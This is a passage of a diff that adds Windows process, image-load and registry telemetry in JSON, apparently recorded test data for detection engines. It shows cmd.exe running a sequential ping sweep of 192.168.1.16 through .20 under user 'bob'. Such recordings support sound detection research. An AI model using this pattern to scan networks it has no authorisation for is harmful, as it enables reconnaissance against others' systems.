+ "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": 
"{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "process", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572061990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.16", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6380, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": 
"{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "process", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572066840000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.17", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4864, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": 
"{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "process", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572071840000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.18", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6964, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}", + "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": 
"{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "process", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572076990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.19", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 792, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + 
"event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "process", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"subtype": "terminate", + "timestamp": 131883572081830000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.20", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4808, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + 
"image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4808, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", + "registry_value": "SecureTimeHigh", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", + "registry_value": "SecureTimeEstimated", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", + "registry_value": "SecureTimeLow", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_value": "RunTime", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + 
"event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", + "registry_value": "SecureTimeTickCount", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", + "registry_value": "SecureTimeConfidence", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", + "registry_value": "SecureTimeHigh", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", + "registry_value": "SecureTimeEstimated", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + 
"process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", + "registry_value": "SecureTimeLow", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_value": "RunTime", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", + "registry_value": "SecureTimeTickCount", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeConfidence", + "registry_value": "SecureTimeConfidence", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "process", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 
